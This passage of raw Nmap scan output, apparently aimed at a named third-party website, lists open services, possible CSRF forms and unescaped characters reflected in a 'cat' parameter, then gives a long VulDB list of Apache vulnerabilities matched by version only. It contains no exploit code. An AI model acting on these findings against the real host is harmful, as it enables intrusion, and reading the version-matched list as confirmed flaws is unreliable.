3248Scanning 1 service on www.ygmt.info (185.82.200.52)
3249Completed Service scan at 00:26, 12.85s elapsed (1 service on 1 host)
3250Initiating OS detection (try #1) against www.ygmt.info (185.82.200.52)
3251Retrying OS detection (try #2) against www.ygmt.info (185.82.200.52)
3252Initiating Traceroute at 00:26
3253Completed Traceroute at 00:26, 0.22s elapsed
3254Initiating Parallel DNS resolution of 14 hosts. at 00:26
3255Completed Parallel DNS resolution of 14 hosts. at 00:26, 0.22s elapsed
3256NSE: Script scanning 185.82.200.52.
3257Initiating NSE at 00:26
3258Completed NSE at 00:27, 87.79s elapsed
3259Initiating NSE at 00:27
3260Completed NSE at 00:27, 1.26s elapsed
3261Nmap scan report for www.ygmt.info (185.82.200.52)
3262Host is up (0.12s latency).
3263rDNS record for 185.82.200.52: latina.petite.guru
3264
3265PORT STATE SERVICE VERSION
3266443/tcp open ssl/ssl Apache httpd (SSL-only mode)
3267| http-brute:
3268|_ Path "/" does not require authentication
3269|_http-chrono: Request times for /; avg: 1066.37ms; min: 846.34ms; max: 1700.39ms
3270| http-csrf:
3271| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=www.ygmt.info
3272| Found the following possible CSRF vulnerabilities:
3273|
3274| Path: https://www.ygmt.info:443/top50/index.php
3275| Form id:
3276| Form action: index.php
3277|
3278| Path: https://www.ygmt.info:443/top50/index.php
3279| Form id:
3280| Form action: index.php
3281|
3282| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Nonude+Sites&start=1
3283| Form id:
3284| Form action: index.php
3285|
3286| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Nonude+Sites&start=1
3287| Form id:
3288| Form action: index.php
3289|
3290| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Free+Sites&start=1
3291| Form id:
3292| Form action: index.php
3293|
3294| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Free+Sites&start=1
3295| Form id:
3296| Form action: index.php
3297|
3298| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Pay+Sites&start=1
3299| Form id:
3300| Form action: index.php
3301|
3302| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Pay+Sites&start=1
3303| Form id:
3304| Form action: index.php
3305|
3306| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Security&start=1
3307| Form id:
3308| Form action: index.php
3309|
3310| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Security&start=1
3311| Form id:
3312| Form action: index.php
3313|
3314| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Top+Lists&start=1
3315| Form id:
3316| Form action: index.php
3317|
3318| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Top+Lists&start=1
3319| Form id:
3320| Form action: index.php
3321|
3322| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Book+Stores&start=1
3323| Form id:
3324| Form action: index.php
3325|
3326| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Book+Stores&start=1
3327| Form id:
3328|_ Form action: index.php
3329|_http-date: Sun, 06 Oct 2019 04:26:17 GMT; -4s from local time.
3330|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
3331|_http-dombased-xss: Couldn't find any DOM based XSS.
3332|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)
3333| http-errors:
3334| Spidering limited to: maxpagecount=40; withinhost=www.ygmt.info
3335| Found the following error pages:
3336|
3337| Error Code: 400
3338| http://www.ygmt.info:80
3339|
3340| Error Code: 404
3341| http://www.ygmt.info:443/android-app:/
3342|
3343| Error Code: 404
3344|_ http://www.ygmt.info:443/url;
3345|_http-feed: Couldn't find any feeds.
3346|_http-fetch: Please enter the complete path of the directory to save data in.
3347| http-headers:
3348| Date: Sun, 06 Oct 2019 04:26:16 GMT
3349| Server: Apache/2.4.10 (Debian)
3350| Last-Modified: Wed, 13 Mar 2019 00:18:15 GMT
3351| ETag: "a0d-583eebde65fc0"
3352| Accept-Ranges: bytes
3353| Content-Length: 2573
3354| Vary: Accept-Encoding
3355| Connection: close
3356| Content-Type: text/html
3357|
3358|_ (Request type: HEAD)
3359|_http-jsonp-detection: Couldn't find any JSONP endpoints.
3360|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
3361| http-methods:
3362|_ Supported Methods: GET HEAD POST OPTIONS
3363|_http-mobileversion-checker: No mobile version detected.
3364| http-security-headers:
3365| Strict_Transport_Security:
3366|_ HSTS not configured in HTTPS Server
3367|_http-server-header: Apache/2.4.10 (Debian)
3368| http-sitemap-generator:
3369| Directory structure:
3370| /
3371| Other: 1
3372| /banner/
3373| jpg: 3
3374| /bn/
3375| png: 1
3376| /top50/
3377| Other: 1; php: 1
3378| Longest directory structure:
3379| Depth: 1
3380| Dir: /top50/
3381| Total files found (by extension):
3382|_ Other: 2; jpg: 3; php: 1; png: 1
3383|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
3384|_http-title: 400 Bad Request
3385| http-unsafe-output-escaping:
3386| Characters [> " '] reflected in parameter cat at https://www.ygmt.info:443/top50/index.php?method=in&cat=Nonude+Sites&start=1
3387| Characters [> " '] reflected in parameter cat at https://www.ygmt.info:443/top50/index.php?method=in&cat=Free+Sites&start=1
3388| Characters [> " '] reflected in parameter cat at https://www.ygmt.info:443/top50/index.php?method=in&cat=Pay+Sites&start=1
3389| Characters [> " '] reflected in parameter cat at https://www.ygmt.info:443/top50/index.php?method=in&cat=Security&start=1
3390| Characters [> " '] reflected in parameter cat at https://www.ygmt.info:443/top50/index.php?method=in&cat=Top+Lists&start=1
3391|_ Characters [> " '] reflected in parameter cat at https://www.ygmt.info:443/top50/index.php?method=in&cat=Book+Stores&start=1
3392| http-vhosts:
3393|_127 names had status 400
3394|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit=<number|all> for deeper analysis)
3395|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
3396|_http-xssed: No previously reported XSS vuln.
3397| vulscan: VulDB - https://vuldb.com:
3398| [141649] Apache OFBiz up to 16.11.05 Form Widget Freemarker Markup Code Execution
3399| [141648] Apache OFBiz up to 16.11.05 Application Stored cross site scripting
3400| [140386] Apache Commons Beanutils 1.9.2 BeanIntrospector unknown vulnerability
3401| [139708] Apache Ranger up to 1.2.0 Policy Import cross site scripting
3402| [139540] cPanel up to 60.0.24 Apache HTTP Server Key information disclosure
3403| [139386] Apache Tike up to 1.21 RecursiveParserWrapper Stack-based memory corruption
3404| [139385] Apache Tika 1.19/1.20/1.21 SAXParsers Hang denial of service
3405| [139384] Apache Tika up to 1.21 RecursiveParserWrapper ZIP File denial of service
3406| [139261] Apache Solr 8.2.0 DataImportHandler Parameter unknown vulnerability
3407| [139259] cPanel up to 68.0.26 WHM Apache Includes Editor information disclosure
3408| [139256] cPanel up to 68.0.26 WHM Apache Configuration Include Editor cross site scripting
3409| [139239] cPanel up to 70.0.22 Apache HTTP Server Log information disclosure
3410| [139141] Apache ActiveMQ Client up to 5.15.4 ActiveMQConnection.java ActiveMQConnection denial of service
3411| [139130] cPanel up to 73.x Apache HTTP Server Injection privilege escalation
3412| [138914] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 VM sql injection
3413| [138913] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 Block Argument privilege escalation
3414| [138912] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 Cookie sql injection
3415| [138816] Apache Storm up to 1.2.2 Logviewer Daemon Log information disclosure
3416| [138815] Apache Storm up to 1.2.2 UI Daemon Deserialization privilege escalation
3417| [138164] Oracle 2.7.0.1 Apache Log4j unknown vulnerability
3418| [138155] Oracle Agile Engineering Data Management 6.2.0/6.2.1 Apache Tomcat unknown vulnerability
3419| [138151] Oracle Transportation Management 6.3.7 Apache Tomcat unknown vulnerability
3420| [138149] Oracle Agile Engineering Data Management 6.2.0/6.2.1 Apache Commons FileUpload unknown vulnerability
3421| [138131] Oracle MICROS Retail XBRi Loss Prevention 10.8.0/10.8.1/10.8.2/10.8.3 Apache Tomcat unknown vulnerability
3422| [138129] Oracle Retail Xstore Point of Service 7.0/7.1 Apache HTTP Server denial of service
3423| [138123] Oracle Retail Order Management System 5.0 Apache Struts 1 unknown vulnerability
3424| [138122] Oracle Retail Order Broker 5.2/15.0 Apache Tomcat unknown vulnerability
3425| [138121] Oracle Retail Order Broker 5.2/15.0 Apache CXF unknown vulnerability
3426| [138112] Oracle Retail Integration Bus 15.0/16.0 Apache Commons FileUpload unknown vulnerability
3427| [138111] Oracle MICROS Retail XBRi Loss Prevention 10.8.0/10.8.1/10.8.2/10.8.3 Apache Commons FileUpload unknown vulnerability
3428| [138103] Oracle PeopleSoft Enterprise PeopleTools 8.55/8.56/8.57 Apache WSS4J information disclosure
3429| [138053] Oracle JD Edwards EnterpriseOne Tools 9.2 Apache Log4j unknown vulnerability
3430| [138036] Oracle Insurance Rules Palette 10.0/10.1/10.2/11.0 Apache Commons FileUpload unknown vulnerability
3431| [138035] Oracle Insurance Policy Administration J2EE 10.0/10.1/10.2/11.0 Apache Commons FileUpload unknown vulnerability
3432| [138034] Oracle Insurance Calculation Engine 9.7/10.0/10.1/10.2 Apache Commons FileUpload unknown vulnerability
3433| [138028] Oracle Identity Manager 11.1.2.3.0/12.2.1.3.0 Apache Log4j unknown vulnerability
3434| [138020] Oracle BI Publisher 11.1.1.9.0 Apache Tomcat unknown vulnerability
3435| [138019] Oracle BI Publisher (formerly XML Publisher) 11.1.1.9.0 Apache Tomcat unknown vulnerability
3436| [138017] Oracle Outside In Technology 8.5.4 Apache Commons FileUpload unknown vulnerability
3437| [138013] Oracle Outside In Technology 8.5.4 Apache Tomcat unknown vulnerability
3438| [138012] Oracle Outside In Technology 8.5.4 Apache HTTP Server unknown vulnerability
3439| [138009] Oracle Outside In Technology 8.5.4 Apache HTTP Server unknown vulnerability
3440| [138008] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 Apache Struts 1 denial of service
3441| [138007] Oracle WebCenter Sites 12.2.1.3.0 Apache Tomcat denial of service
3442| [138006] Oracle Enterprise Repository 12.1.3.0.0 Apache CXF denial of service
3443| [138000] Oracle WebCenter Sites 12.2.1.3.0 Apache Commons FileUpload unknown vulnerability
3444| [137999] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 Apache Commons FileUpload unknown vulnerability
3445| [137995] Oracle Hospitality Simphony 18.2.1 Apache WSS4J information disclosure
3446| [137987] Oracle FLEXCUBE Universal Banking up to 12.0.3/12.4.0/14.2.0 Apache Log4j unknown vulnerability
3447| [137981] Oracle Insurance IFRS 17 Analyzer 8.0.6/8.0.7 Apache Commons FileUpload unknown vulnerability
3448| [137980] Oracle Insurance Data Foundation 8.0.4/8.0.5/8.0.6/8.0.7 Apache Commons FileUpload unknown vulnerability
3449| [137979] Oracle 8.0.8 Apache Commons FileUpload unknown vulnerability
3450| [137973] Oracle 8.0.4/8.0.5/8.0.6/8.0.7 Apache Batik unknown vulnerability
3451| [137970] Oracle Financial Services Profitability Management 8.0.4/8.0.5/8.0.6/8.0.7 Apache ActiveMQ unknown vulnerability
3452| [137967] Oracle up to 8.0.7 Apache httpd unknown vulnerability
3453| [137966] Oracle 8.0.7/8.0.8 Apache Groovy unknown vulnerability
3454| [137965] Oracle Financial Services Liquidity Risk Management 8.0.1/8.0.2/8.0.4/8.0.5/8.0.6 Apache Commons FileUpload unknown vulnerability
3455| [137964] Oracle 8.0.4/8.0.5/8.0.6/8.0.7 Apache Log4j unknown vulnerability
3456| [137933] Oracle Banking Platform up to 2.7.1 Apache Tika unknown vulnerability
3457| [137926] Oracle Enterprise Manager for Fusion Middleware 13.2/13.3 Apache Commons FileUpload information disclosure
3458| [137924] Oracle Enterprise Manager Base Platform 12.1.0.5.0/13.2.0.0.0/13.3.0.0.0 Apache Commons FileUpload unknown vulnerability
3459| [137914] Oracle E-Business Suite up to 12.2.8 Apache ActiveMQ unknown vulnerability
3460| [137913] Oracle E-Business Suite up to 12.2.8 Apache ActiveMQ unknown vulnerability
3461| [137911] Oracle E-Business Suite up to 12.2.8 Apache HTTP Server unknown vulnerability
3462| [137910] Oracle E-Business Suite up to 12.2.8 Apache CXF information disclosure
3463| [137909] Oracle E-Business Suite up to 12.2.8 Apache Commons FileUpload unknown vulnerability
3464| [137905] Oracle Primavera Gateway 15.2/16.2/17.12/18.8 Apache Tika denial of service
3465| [137901] Oracle Primavera Unifier up to 18.8 Apache HTTP Server unknown vulnerability
3466| [137895] Oracle Instant Messaging Server 10.0.1.2.0 Apache Tika information disclosure
3467| [137894] Oracle EAGLE (Software) 46.5/46.6/46.7 Apache Tomcat information disclosure
3468| [137892] Oracle Online Mediation Controller 6.1 Apache Batik denial of service
3469| [137891] Oracle Interactive Session Recorder 6.0/6.1/6.2 Apache Tomcat unknown vulnerability
3470| [137885] Oracle Diameter Signaling Router (DSR) 8.0/8.1/8.2 Apache cxf unknown vulnerability
3471| [137882] Oracle Unified 8.0.0.2.0 Apache Commons FileUpload unknown vulnerability
3472| [137881] Oracle Online Mediation Controller 6.1 Apache Commons FileUpload unknown vulnerability
3473| [137880] Oracle Interactive Session Recorder 6.0/6.1/6.2 Apache Log4j unknown vulnerability
3474| [137879] Oracle Convergence 3.0.2 Apache Commons FileUpload unknown vulnerability
3475| [137876] Oracle Application Session Controller 3.7.1/3.8.0 Apache Commons FileUpload unknown vulnerability
3476| [137829] Apache Roller 5.2.3 Math Comment Authenticator Reflected cross site scripting
3477| [137736] Apache Kafka 0.11.0.0/2.1.0 ACL Validation Request privilege escalation
3478| [136858] MakerBot Replicator 5G Printer Apache HTTP Server information disclosure
3479| [136849] Analogic Poste.io 2.1.6 on Apache RoundCube logs/ information disclosure
3480| [136822] Apache Tomcat up to 8.5.40/9.0.19 Incomplete Fix CVE-2019-0199 Resource Exhaustion denial of service
3481| [136808] Apache Geode up to 1.8.0 Secure Mode privilege escalation
3482| [136646] Apache Allura up to 1.10.x Dropdown Selector Stored cross site scripting
3483| [136374] Apache HTTP Server up to 2.4.38 Slash Regular Expression unknown vulnerability
3484| [136373] Apache HTTP Server 2.4.34/2.4.35/2.4.36/2.4.37/2.4.38 HTTP2 Request Crash denial of service
3485| [136372] Apache HTTP Server up to 2.4.38 HTTP2 Request unknown vulnerability
3486| [136370] Apache Fineract up to 1.2.x sql injection
3487| [136369] Apache Fineract up to 1.2.x sql injection
3488| [135731] Apache Hadoop up to 2.8.4/2.9.1/3.1.0 yarn privilege escalation
3489| [135664] Apache Tomcat up to 7.0.93/8.5.39/9.0.0.17 SSI printenv Command cross site scripting
3490| [135663] Apache Camel up to 2.23.x JSON-lib Library XML Data XML External Entity
3491| [135661] Apache Roller up to 5.2.1/5.2.0 XML-RPC Interface XML File Server-Side Request Forgery
3492| [135402] Apache Zookeeper up to 3.4.13/3.5.0-alpha to 3.5.4-beta getACL() information disclosure
3493| [135270] Apache JSPWiki up to 2.11.0.M3 Plugin Link cross site scripting
3494| [135269] Apache JSPWiki up to 2.11.0.M3 InterWiki Link cross site scripting
3495| [135268] Apache JSPWiki up to 2.11.0.M3 Attachment cross site scripting
3496| [134527] Apache Karaf up to 4.2.4 Config Service directory traversal
3497| [134416] Apache Sanselan 0.97-incubator Loop denial of service
3498| [134415] Apache Sanselan 0.97-incubator Hang denial of service
3499| [134291] Apache Axis up to 1.7.8 Server-Side Request Forgery
3500| [134290] Apache UIMA DUCC up to 2.2.2 cross site scripting
3501| [134248] Apache Archiva up to 2.2.3 Artifact Upload directory traversal
3502| [134247] Apache Archiva up to 2.2.3 Artifact Upload directory traversal
3503| [134246] Apache Camel up to 2.19/2.21.3/2.22.2/2.23.0 directory traversal
3504| [134138] Apache Pluto 3.0.0/3.0.1 Chat Room Demo Portlet cross site scripting
3505| [133992] Apache Qpid Proton up to 0.27.0 Certificate Validation Man-in-the-Middle weak authentication
3506| [133977] Apache Zeppelin up to 0.7.x Stored cross site scripting
3507| [133976] Apache Zeppelin up to 0.7.x Cron Scheduler privilege escalation
3508| [133975] Apache Zeppelin up to 0.7.2 Session Fixation weak authentication
3509| [133444] Apache PDFbox 2.0.14 XML Parser XML External Entity
3510| [133573] Oracle FLEXCUBE Private Banking 2.0.0.0/2.2.0.1/12.0.1.0/12.0.3.0/12.1.0.0 Apache ActiveMQ unknown vulnerability
3511| [133407] Apache Tomcat up to 7.0.93/8.5.39/9.0.17 on Windows JRE Command Line Argument Code Execution
3512| [133315] Apache Airflow up to 1.10.2 HTTP Endpoint cross site request forgery
3513| [133314] Apache Airflow up to 1.10.2 Metadata Database cross site scripting
3514| [133290] Apache Tomcat up to 8.5.37/9.0.14 HTTP2 Stream Execution denial of service
3515| [133112] Apache HTTP Server up to 2.4.38 mod_auth_digest race condition privilege escalation
3516| [133111] Apache HTTP Server 2.4.37/2.4.38 mod_ssl Bypass privilege escalation
3517| [133092] Airsonic 10.2.1 org.apache.commons.lang.RandomStringUtils RecoverController.java java.util.Random weak authentication
3518| [132568] Apache JSPWiki up to 2.11.0.M2 URL User information disclosure
3519| [132567] Apache JSPWiki up to 2.11.0.M2 URL cross site scripting
3520| [132566] Apache ActiveMQ up to 5.15.8 MQTT Frame Memory denial of service
3521| [132565] Apache HBase up to 2.1.3 REST Server Request privilege escalation
3522| [132183] Apache Mesos up to pre-1.4.x Docker Image Code Execution
3523| [131988] Apache Karaf up to 4.2.2 kar Deployer directory traversal
3524| [131859] Apache Hadoop up to 2.9.1 privilege escalation
3525| [131479] Apache Solr up to 7.6 HTTP GET Request Server-Side Request Forgery
3526| [131446] Apache Solr up to 5.0.5/6.6.5 Config API HTTP POST Request Code Execution
3527| [131385] Apache Qpid Broker-J up to 6.x/7.0.6/7.1.0 AMQP Command Crash denial of service
3528| [131315] Apache Mesos up to pre-1.4.x Mesos Masters Rendering JSON Payload Recursion denial of service
3529| [131236] Apache Airflow up to 1.10.1 Metadata Database cross site scripting
3530| [130755] Apache JSPWiki up to 2.10.5 URL cross site scripting
3531| [130629] Apache Guacamole Cookie Flag weak encryption
3532| [130628] Apache Hadoop up to 3.0.0 HDFS information disclosure
3533| [130529] Apache Subversion 1.10.0/1.10.1/1.10.2/1.10.3/1.11.0 mod_dav_svn Directory Crash denial of service
3534| [130353] Apache Open Office up to 4.1.5 Document Loader String memory corruption
3535| [130341] Apache HTTP Server 2.4.37 mod_ssl Loop denial of service
3536| [130330] Apache HTTP Server up to 2.4.37 mod_session Expired privilege escalation
3537| [130329] Apache HTTP Server 2.4.37 mod_http2 Slowloris denial of service
3538| [130212] Apache Airflow up to 1.10.0 LDAP Auth Backend Certificate weak authentication
3539| [130123] Apache Airflow up to 1.8.2 information disclosure
3540| [130122] Apache Airflow up to 1.8.2 command injection cross site request forgery
3541| [130121] Apache Airflow up to 1.8.2 Webserver Object Code Execution
3542| [129717] Oracle Secure Global Desktop 5.4 Apache HTTP Server denial of service
3543| [129688] Oracle Tape Library ACSLS 8.4 Apache Log4j unknown vulnerability
3544| [129673] Oracle Retail Returns Management 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
3545| [129672] Oracle Retail Central Office 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
3546| [129671] Oracle Retail Back Office 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
3547| [129574] Oracle Outside In Technology 8.5.3/8.5.4 Apache Tomcat denial of service
3548| [129573] Oracle WebLogic Server 10.3.6.0 Apache HTTP Server denial of service
3549| [129563] Oracle Enterprise Repository 12.1.3.0.0 Apache Log4j unknown vulnerability
3550| [129555] Oracle Outside In Technology 8.5.3 Apache Batik denial of service
3551| [129551] Oracle Outside In Technology 8.5.3/8.5.4 Apache Commons FileUpload denial of service
3552| [129542] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
3553| [129538] Oracle SOA Suite 12.1.3.0.0/12.2.1.3.0 Apache Batik unknown vulnerability
3554| [129519] Oracle Enterprise Manager Ops Center 12.2.2/12.3.3 Apache ActiveMQ unknown vulnerability
3555| [129508] Oracle Applications Manager up to 12.2.8 Apache Derby unknown vulnerability
3556| [129507] Oracle Mobile Field Service up to 12.2.8 Apache Log4j unknown vulnerability
3557| [129505] Oracle Email Center up to 12.2.8 Apache Log4j unknown vulnerability
3558| [129504] Oracle CRM Technical Foundation up to 12.2.8 Apache Commons FileUpload unknown vulnerability
3559| [129499] Oracle Partner Management up to 12.2.8 Apache Log4j unknown vulnerability
3560| [129498] Oracle Marketing up to 12.2.8 Apache Commons FileUpload unknown vulnerability
3561| [129480] Oracle Communications WebRTC Session Controller up to 7.1 Apache Batik unknown vulnerability
3562| [129479] Oracle Communications Diameter Signaling Router up to 8.2 Apache Batik unknown vulnerability
3563| [129474] Oracle Communications Diameter Signaling Router up to 8.2 Apache HTTP Server information disclosure
3564| [129472] Oracle Communications WebRTC Session Controller up to 7.1 Apache Struts 1 unknown vulnerability
3565| [129470] Oracle Communications Converged Application Server up to 7.0.0.0 Apache Struts 1 unknown vulnerability
3566| [129463] Oracle Communications WebRTC Session Controller up to 7.1 Apache Log4j unknown vulnerability
3567| [129461] Oracle Communications Services Gatekeeper up to 6.1.0.3.x Apache Commons Collections Fileupload unknown vulnerability
3568| [129460] Oracle Communications Service Broker 6.0 Apache Log4j unknown vulnerability
3569| [129459] Oracle Communications Policy Management up to 12.4 Apache Struts 2 unknown vulnerability
3570| [129458] Oracle Communications Online Mediation Controller 6.1 Apache Log4j unknown vulnerability
3571| [129457] Oracle Communications Diameter Signaling Router up to 8.2 Apache Commons Fileupload unknown vulnerability
3572| [129456] Oracle Communications Converged Application Server 6.1 Apache Log4j unknown vulnerability
3573| [128714] Apache Thrift Java Client Library up to 0.11.0 SASL Negotiation org.apache.thrift.transport.TSaslTransport unknown vulnerability
3574| [128713] Apache Thrift Node.js Static Web Server up to 0.11.0 directory traversal
3575| [128709] Apache Karaf up to 4.1.6/4.2.1 Features Deployer XMLInputFactory XML External Entity
3576| [128575] Apache NetBeans 9.0 Proxy Auto-Config Code Execution
3577| [128369] Apache Tika 1.8-1.19.1 SQLite3Parser Loop sql injection
3578| [128111] Apache NiFi 1.8.0 Template Upload Man-in-the-Middle cross site request forgery
3579| [128110] Apache NiFi 1.8.0 Cluster Request privilege escalation
3580| [128109] Apache NiFi 1.8.0 Error Page message-page.jsp Request Header cross site scripting
3581| [128108] Apache NiFi up to 1.7.x X-Frame-Options Header privilege escalation
3582| [128102] Apache Oozie up to 5.0.0 Workflow XML Impersonation spoofing
3583| [127994] WordPress up to 5.0.0 on Apache httpd MIME Restriction cross site scripting
3584| [127981] Apache OFBiz 16.11.01/16.11.02/16.11.03/16.11.04 HTTP Engine httpService GET Request privilege escalation
3585| [127161] Apache Hadoop 2.7.4/2.7.5/2.7.6 Incomplete Fix CVE-2016-6811 privilege escalation
3586| [127040] Loadbalancer.org Enterprise VA MAX up to 8.3.2 Apache HTTP Server Log cross site scripting
3587| [127007] Apache Spark Request Code Execution
3588| [126791] Apache Hadoop up to 0.23.11/2.7.6/2.8.4/2.9.1/3.0.2 ZIP File unknown vulnerability
3589| [126767] Apache Qpid Proton-J Transport 0.3 Certificate Verification Man-in-the-Middle weak authentication
3590| [126896] Apache Commons FileUpload 1.3.3 on LDAP Manager DiskFileItem File privilege escalation
3591| [126574] Apache Hive up to 2.3.3/3.1.0 Query privilege escalation
3592| [126573] Apache Hive up to 2.3.3/3.1.0 HiveServer2 privilege escalation
3593| [126564] Apache Superset up to 0.22 Pickle Library load Code Execution
3594| [126488] Apache Syncope up to 2.0.10/2.1.1 BPMN Definition xxe privilege escalation
3595| [126487] Apache Syncope up to 2.0.10/2.1.1 cross site scripting
3596| [126346] Apache Tomcat Path privilege escalation
3597| [125922] Apache Impala up to 3.0.0 ALTER privilege escalation
3598| [125921] Apache Impala up to 3.0.0 Queue Injection privilege escalation
3599| [125647] Oracle Agile Engineering Data Management 6.1.3/6.2.0/6.2.1 Install (Apache Tomcat) information disclosure
3600| [125617] Oracle Retail Returns Management 14.1 Apache Batik unknown vulnerability
3601| [125616] Oracle Retail Point-of-Service 13.4/14.0/14.1 Apache Batik unknown vulnerability
3602| [125614] Oracle Retail Central Office 14.1 Apache Batik unknown vulnerability
3603| [125613] Oracle Retail Back Office 13.3/13.4/14/14.1 Apache Batik unknown vulnerability
3604| [125599] Oracle Retail Open Commerce Platform 5.3.0/6.0.0/6.0.1 Apache Log4j unknown vulnerability
3605| [125569] Oracle PeopleSoft Enterprise PeopleTools 8.55/8.56 Apache HTTP Server information disclosure
3606| [125494] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat information disclosure
3607| [125447] Oracle Business Intelligence Enterprise Edition 11.1.1.7.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Apache Batik unknown vulnerability
3608| [125428] Oracle Identity Management Suite 11.1.2.3.0/12.2.1.3.0 Apache Log4j unknown vulnerability
3609| [125427] Oracle Identity Analytics 11.1.1.5.8 Apache Log4j unknown vulnerability
3610| [125424] Oracle API Gateway 11.1.2.4.0 Apache Log4j unknown vulnerability
3611| [125423] Oracle BI Publisher 11.1.1.7.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Apache Log4j unknown vulnerability
3612| [125383] Oracle up to 10.2.0 Apache Trinidad unknown vulnerability
3613| [125379] Oracle up to 10.1.x Apache Struts 1 cross site scripting
3614| [125377] Oracle up to 10.2.0 Apache Commons Collections unknown vulnerability
3615| [125376] Oracle Communications Application Session Controller up to 3.7.0 Apache Commons Collections unknown vulnerability
3616| [125375] Oracle Communications User Data Repository up to 12.1.x Apache Xerces memory corruption
3617| [125248] Apache ActiveMQ up to 5.15.5 Web-based Administration Console queue.jsp Parameter cross site scripting
3618| [125133] Apache Tika up to 1.19 XML Parser reset() denial of service
3619| [124877] Apache PDFbox up to 2.0.11 PDF File denial of service
3620| [124876] Apache Ranger up to 1.1.x UnixAuthenticationService Stack-based memory corruption
3621| [124791] Apache Tomcat up to 7.0.90/8.5.33/9.0.11 URL Open Redirect
3622| [124787] Apache Pony Mail 0.7/0.8/0.9 Statistics Generator Timestamp Data information disclosure
3623| [124447] Apache HTTP Server up to 2.4.34 SETTINGS Frame denial of service
3624| [124346] Apache Mesos pre-1.4.2/1.5.0/1.5.1/1.6.0 on Executor HTTP API String Comparison validation JSON Web Token information disclosure
3625| [124286] Apache Tika up to 1.18 IptcAnpaParser Loop denial of service
3626| [124242] Apache Tika up to 0.18 C:/evil.bat" Directory unknown vulnerability
3627| [124241] Apache Tika up to 0.18 XML Parser Entity Expansion denial of service
3628| [124191] Apache Karaf up to 3.0.8/4.0.8/4.1.0 WebConsole .../gogo/ weak authentication
3629| [124190] Apache Karaf up to 4.1.x sshd privilege escalation
3630| [124152] Apache Camel Mail up to 2.22.0 Path directory traversal
3631| [124143] Apache SpamAssassin up to 3.4.1 PDFInfo Plugin Code Execution
3632| [124134] Apache SpamAssassin up to 3.4.1 Scan Engine HTML::Parser Email denial of service
3633| [124095] PHP up to 5.6.37/7.0.31/7.1.21/7.2.9 Apache2 sapi_apache2.c php_handler cross site scripting
3634| [124024] Apache Mesos 1.4.x/1.5.0 libprocess JSON Payload denial of service
3635| [123814] Apache ActiveMQ Client up to 5.15.5 TLS Hostname Verification Man-in-the-Middle weak authentication
3636| [123393] Apache Traffic Server up to 6.2.2/7.1.3 ESI Plugin Config privilege escalation
3637| [123392] Apache Traffic Server 6.2.2 TLS Handshake Segmentation Fault denial of service
3638| [123391] Apache Traffic Server up to 6.2.2/7.1.3 Range Request Performance denial of service
3639| [123390] Apache Traffic Server up to 6.2.2/7.1.3 Request HTTP Smuggling privilege escalation
3640| [123369] Apache Traffic Server up to 6.2.2/7.1.3 ACL remap.config Request denial of service
3641| [123197] Apache Sentry up to 2.0.0 privilege escalation
3642| [123145] Apache Struts up to 2.3.34/2.5.16 Namespace Code Execution
3643| [123144] Apache Cayenne up to 4.1.M1 CayenneModeler XML File File Transfer privilege escalation
3644| [122981] Apache Commons Compress 1.7 ZipArchiveInputStream ZIP Archive denial of service
3645| [122889] Apache HTTP Server up to 2.2.31/2.4.23 mod_userdir HTTP Response Splitting privilege escalation
3646| [122800] Apache Spark 1.3.0 REST API weak authentication
3647| [122642] Apache Airflow up to 1.8.x 404 Page Reflected cross site scripting
3648| [122568] Apache Tomcat up to 8.5.31/9.0.9 Connection Reuse weak authentication
3649| [122567] Apache Axis 1.0./1.1/1.2/1.3/1.4 cross site scripting
3650| [122556] Apache Tomcat up to 7.0.86/8.0.51/8.5.30/9.0.7 UTF-8 Decoder Loop denial of service
3651| [122531] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.9 WebSocket Client unknown vulnerability
3652| [122456] Apache Camel up to 2.20.3/2.21.0 XSD Validator XML External Entity
3653| [122455] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Revoked Certificate weak authentication
3654| [122454] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Responder Revoked Certificate weak authentication
3655| [122214] Apache Kafka up to 0.9.0.1/0.10.2.1/0.11.0.2/1.0.0 Broker Request Data Loss denial of service
3656| [122202] Apache Kafka up to 0.10.2.1/0.11.0.1 SASL Impersonation spoofing
3657| [122101] Docker Skeleton Runtime for Apache OpenWhisk Docker Action dockerskeleton:1.3.0 privilege escalation
3658| [122100] PHP Runtime for Apache OpenWhisk Docker Action action-php-v7.2:1.0.0 privilege escalation
3659| [122012] Apache Ignite up to 2.5 Serialization privilege escalation
3660| [121911] Apache Ambari up to 2.5.x/2.6.2 Log Message Credentials information disclosure
3661| [121910] Apache HTTP Server 2.4.33 mod_md HTTP Requests denial of service
